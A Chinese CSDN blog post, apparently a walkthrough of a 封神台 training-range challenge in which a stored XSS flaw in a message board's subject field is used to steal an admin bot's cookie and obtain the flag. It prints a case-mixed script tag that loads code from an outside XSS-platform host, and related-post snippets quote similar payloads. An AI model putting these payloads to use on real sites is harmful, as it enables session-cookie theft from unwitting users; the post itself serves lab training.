第三章:为了更多的权限!留言板!

最新推荐文章于 2024-05-05 18:20:37 发布
最新推荐文章于 2024-05-05 18:20:37 发布
阅读量562 收藏 2
点赞数 2
分类专栏: # 封神台靶场 文章标签: 网络安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51195235/article/details/128440332
版权

0X01.目标站点

可以看到目标是一个留言板,常见的留言板就是存储型xss,常常出现的地方

点击传送门

0X02.测试弹窗

点击提交

可以看到主题是一个可以回显的点

且可以看到,是已经写入到数据库当中,当做js脚本语言进行执行

0X03.拿取cookie

1.设置好payload

在一个常用的xss平台(任何一个平台都可以)

https://xss.pt/

2.再次提交

将这一行代码复制到刚刚的主题部分再提交一次

<sCRiPt sRC=//xss.pt/UNXD></sCrIpT>

3.拿到flag

可能会有点慢,等一会刷新几次就出来了

zkz{xsser-g00d}

0X04.总结

1.观察目标站点的具体内容

2.利用一些现成的payload进行测试

3.再利用平台的payload进行测试

PGone~
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS留言板实现
极客剑寮
02-21 1230
XSS留言板实现 XSS 留言板实现-笔记 预备知识 XSS漏洞 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS最...
第三章:为了多的权限 留言板
m0_48294281的博客
12-31 1356
靶场学习心得,欢迎大家交流!
封神台 第三章:为了多的权限留言板!【配套课时:cookie伪造目标权限 实战演练】
06-14 2446
题目 Tips: 1、存储型Xss 2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站! 他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。 尤里开始动手…… 1.进入留言的页面,测试弹窗 发现弹框显示1,注入点为主题 ...
CTF之留言板
最新发布
qq_74263993的博客
05-05 198
题目就一个留言板,根据题目提示可以知道这个题存在xss漏洞,仔细观察应该与存储型xss有关,也就是将恶意代码保存到服务器端。得到flag%7B4529de53721bbf7e9b0401d47e0b2f1d%7D,其中%7B解码为{,接着找一个xss平台(https://xssaq.com/)用来接收,创建一个项目,然后把代码注入。接着便可以在xss平台接收内容了。
网络渗透测试实验三
qq_62623325的博客
11-24 947
网络渗透测试实验三
封神台 第三章 为了多的权限留言板!(Cookie)
m0_65712192的博客
10-17 602
封神台 第三章 为了多的权限留言板!(Cookie)
xss跨站脚本攻击
开心星人的博客
02-26 6339
概述: 主要指攻击者可以再页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份、钓鱼、传播恶意代码和控制用户浏览器等行为 产生原因: 由于web程序对用户的输入过滤不足、,导致用户输入的恶意HTML/Javascript 代码注入到网页中,混淆原有语义,产生新的恶意语句。在其他用户访问网页时,浏览器就会触发恶意的网页代码,从而达到XSS攻击的目的 分类: 反射型:恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击 输入: 输
基于 nodejs express mysql 开发的留言板 demo.zip
04-19
MySQL拥有庞大的开发者社区和丰富的第三方插件、库、中间件支持,提供了丰富的文档、教程、论坛以及专业服务,极大地简化了开发、运维和故障排查过程。 关键组件与日志 系统数据库 MySQL内部包含几个特殊的系统...
第五媒体数字杂志系统1.02build070201版
02-29
并提供扩展接口,让用户可自己创作丰富的效果、实现多的功能;用户创作的效果与功能还能共享。 其次,制作数字杂志就像玩博客那样简单。无需任何专用工具,只要登陆网站,点点选选,然后点击“保存”,就能完成...
B2Bbuilder_v6.5.2.zip 电子商务行业网站内容管理系统!
08-20
地图模块 和第三方地图合作,可以自动识别用户的地址,在地图上标出来 在线反馈 网站的访客可以给管理员进行反馈,以便管理员及时了解网站信息,登录的会员也可以给管理员发布反馈信息,系统会自动记录该会员的信息...
交友相亲社交网站模板支持手机wap版
08-05
想建立一个交友,婚恋,征婚网站平台,让多的人在自己的网站上交友找到配偶或者知已,或者想拥有一套类似世纪佳缘交友网页模板的人。 特色功能: 1、新增第三方合作网站登录模块,腾讯QQ和新浪微博,加方便网友...
Movable Type 博客系统 v5.14.rar
08-30
四、多的技术创新。内置了类似OpenID的尖端技术,能很好的补充原有的用户注册功能。同时,MT使用一套强劲的全定制功能来建立一套强大的权限系统,你可以精确设置每个注册用户的权限。 五、特色功能。MT4支持建立...
网络渗透测试实验三 XSS和SQL注入
weixin_74109869的博客
12-26 1146
综上所述,XSS和SQL注入是常见的网络安全漏洞,通过渗透测试实验可以发现并修复这些漏洞,保护网站的安全。属于储存型XSS,留言过程中,网站没有对输入框的内容进行严格处理,能够被网页执行留言内容,从而被攻击。为了防止XSS攻击,开发人员应该对用户输入进行严格的过滤和验证,确保任何用户输入的内容都经过正确的编码和转义,以防止恶意脚本的注入。在注入实验中,使用恶意语句成功地进行了注入攻击,获取了数据库中的敏感数据.通过这次实验,我认识到SQL注入漏洞对数据库安全的威胁。查看down到本地的用户名与密码,截图。
XSS攻击
gghhb12的博客
03-29 4588
XSS攻击
封神台----尤里的复仇I-第四章:为了多的权限留言板!!
正在学习的路上...
07-18 1077
本章主要是xss平台使用,很简单。 自己搭建xss平台或者网上随便找个平台注册使用。 新建个项目,建好后,将下面代码复制到留言板里。 提交,即可。去XSS平台接收消息。 提交,完成。 ...
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1047
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
封神台-尤里的复仇Ⅰ
weixin_44522540的博客
02-20 706
封神台-尤里的复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录封神台-尤里的复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了多的权限留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
实验三 XSS和SQL注入
m0_62685257的博客
11-21 659
实验三 XSS和SQL注入
封神台-第四章 为了多的权限留言板
ploto_cs的博客
09-27 1171
封神台-第四章 为了多的权限留言板 1.进入留言的页面,测试弹窗 根据提示为存储型XSS 测试语句为 可以看到成功弹窗 2.搭建xss平台 随意注册一个账户 https://xsspt.com/index.php?do=login 配置前两个必须选 复制语句: </textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script> 3.测试新语句 4.在xss平台看截取
k210 报错runtimeerror:Sensor Timeout!!
07-27
您好!对于报错"RuntimeError: Sensor Timeout!!",这通常是由于K210芯片在读取传感器数据时超时引起的。可能的原因包括: 1. 传感器连接不正常:请检查传感器的电源和信号线连接是否正确,确保传感器与K210芯片之间的连接良好。 2. 传感器故障:如果传感器本身出现故障,可能导致读取超时。您可以尝试换传感器或使用其他方法来验证传感器是否正常工作。 3. 软件配置错误:请确保您的代码中正确配置了传感器的相关参数,例如时钟频率、通信协议等。还要确保您的代码逻辑正确,没有其他地方导致超时错误。 如果您能提供多的细节和上下文信息,我可以给出具体的建议。希望能对您有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值